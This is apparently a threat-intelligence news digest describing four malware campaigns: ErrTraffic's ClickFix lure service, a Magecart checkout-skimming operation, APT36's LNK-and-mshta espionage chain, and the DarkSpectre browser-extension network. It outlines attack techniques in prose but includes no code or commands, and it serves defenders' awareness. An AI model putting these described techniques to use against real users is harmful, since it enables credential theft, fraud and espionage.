Update: The Industrialization of ClickFix Social Engineering Through ErrTraffic
Researchers at HudsonRock have discovered ErrTraffic, a new ClickFix service that is currently being marketed for approximately $800 on Russian-language cybercrime forums. ErrTraffic lowers the barrier to entry for threat actors by providing a polished, SaaS-like platform that automates lure deployment, victim fingerprinting, and payload delivery across Windows, macOS, Android, and Linux systems. The service relies on psychologically manipulative “fake glitch” overlays that visually corrupt legitimate websites, creating a sense of urgency and prompting users to manually execute malicious commands under the guise of fixing a system error. Campaign telemetry observed by researchers shows conversion rates approaching 60%, highlighting how effectively ErrTraffic exploits the trust gap between browser activity and operating system-level execution to bypass modern browser protections and endpoint defenses. From an operational perspective, ErrTraffic functions as both a traffic distribution system and a force multiplier for the broader cybercrime ecosystem. Compromised websites are weaponized through lightweight script injection that preserves normal site functionality for most visitors, allowing campaigns to persist undetected while selectively targeting victims outside excluded CIS regions. The delivered payloads are predominantly commodity infostealers, which harvest credentials not only for financial abuse but also for administrative access to content management systems and hosting panels. These stolen credentials are then reused or sold to propagate ErrTraffic onto additional websites, creating a self-reinforcing infection loop that feeds downstream actors, including initial access brokers, ransomware operators, and advanced intrusion groups. ErrTraffic illustrates how social engineering has become industrialized, shifting the defensive challenge away from purely technical controls toward disrupting credential abuse cycles and reducing the impact of inevitable user-driven execution events.
Update: Magecart Campaign Expands from Payment Skimming to Identity Compromise
Researchers at Source Defense Research have found that a newly uncovered Magecart operation represents a significant escalation in client-side web attacks, leveraging more than 50 distinct malicious scripts to compromise checkout and account creation flows across global e-commerce platforms. Unlike earlier Magecart campaigns that passively skimmed form data, this operation actively manipulates the user experience through modular, payment-processor-specific payloads targeting providers such as Stripe, Mollie, PagSeguro, OnePay, and PayPal. The malware dynamically detects which payment gateway is in use, suppresses legitimate payment iframes, and injects visually identical phishing forms to capture sensitive information before encryption occurs, allowing the transaction to proceed normally and minimizing user suspicion. Beyond payment card theft, the campaign demonstrates a strategic shift toward full identity compromise and long-term persistence. The scripts incorporate advanced anti-forensics techniques, including hidden DOM inputs for covert exfiltration, asynchronous “silent skimming,” and the use of Luhn-valid junk data to evade security testing and automated scans. In several cases, stolen credentials were subsequently used to create rogue administrator accounts within e-commerce CMS environments, enabling attackers to maintain access even after initial vulnerabilities were remediated. By harvesting credentials, PII, and account recovery data alongside payment details, this campaign enables downstream account takeover, fraud, and reinfection scenarios, underscoring how Magecart operations are evolving into broader, identity-centric intrusion frameworks rather than isolated card-skimming attacks.
APT36 Employs Weaponized LNK Files for Fileless Espionage Operations Against Indian Targets
Cyfrima identified a targeted cyber-espionage campaign attributed to APT36 (Transparent Tribe), a Pakistan-aligned threat actor with a long history of operations against the Indian government, academic, and strategic organizations. The campaign relies on spear-phishing emails delivering a ZIP archive containing a malicious Windows shortcut (LNK) file masquerading as a legitimate PDF document. Uniquely, the shortcut embeds a full PDF structure to closely match expected file size and appearance, increasing user trust and interaction. When executed, the LNK abuses the trusted Windows binary mshta[.]exe to retrieve and run attacker-controlled HTA content, initiating a fully fileless infection chain. This approach allows the threat actor to blend malicious execution with legitimate system activity while minimizing on-disk artifacts and user suspicion. Once triggered, the HTA loader performs layered decryption and in-memory deserialization to reconstruct multiple encrypted payloads, ultimately deploying a fully featured Remote Access Trojan. The malware weakens .NET deserialization safeguards, executes malicious DLLs entirely in memory, and dynamically adapts persistence mechanisms based on detected antivirus products. It establishes encrypted command-and-control communications, supports remote command execution, file manipulation, credential and document theft, clipboard monitoring, and remote desktop surveillance. These capabilities enable long-term, covert access aligned with intelligence collection rather than short-term disruption. Overall, the campaign reflects a clear evolution in APT36’s tradecraft, combining deception, living-off-the-land techniques, and security-aware execution paths to sustain stealthy espionage operations within high-value Indian environments.
DarkSpectre: A Large-Scale Browser Extension Operation Enabling Surveillance, Fraud, and Corporate Espionage
A newly discovered and highly organized threat operation dubbed DarkSpectre has been responsible for multiple interconnected malicious browser extension campaigns that have infected more than 8.8 million users across Chrome, Edge, Firefox, and Opera over a seven-year period. Rather than isolated or opportunistic abuse, the activity reflects a coordinated ecosystem spanning three major campaigns: ShadyPanda, GhostPoster, and a newly disclosed operation known as the Zoom Stealer. Investigators were able to link these campaigns through shared “clean” infrastructure domains used to power legitimate extension functionality, which were quietly reused across different malicious clusters. This reuse enabled DarkSpectre to operate hundreds of extensions simultaneously, many of which functioned legitimately for years before selectively activating malicious behavior, allowing the group to scale while evading marketplace review and user suspicion. The most concerning evolution is the Zoom Stealer campaign, which targets corporate meeting intelligence rather than consumer data. Extensions disguised as benign productivity or media tools request excessive permissions across more than 28 video conferencing platforms and establish persistent WebSocket connections to exfiltrate meeting links, credentials, participant lists, speaker profiles, and company metadata in real time. Combined with DarkSpectre’s other playbooks, including long-term spyware operations and steganographic payload delivery via extension assets, the activity demonstrates exceptional patience, funding, and technical versatility. Infrastructure placement, code artifacts, and monetization strategies strongly suggest a China-based operation operating at a near-nation-state scale. Collectively, these findings highlight a systemic weakness in browser extension security models; trust is established once at publication but can be exploited years later, enabling large-scale surveillance, affiliate fraud, and corporate espionage through tools users believe are safe.
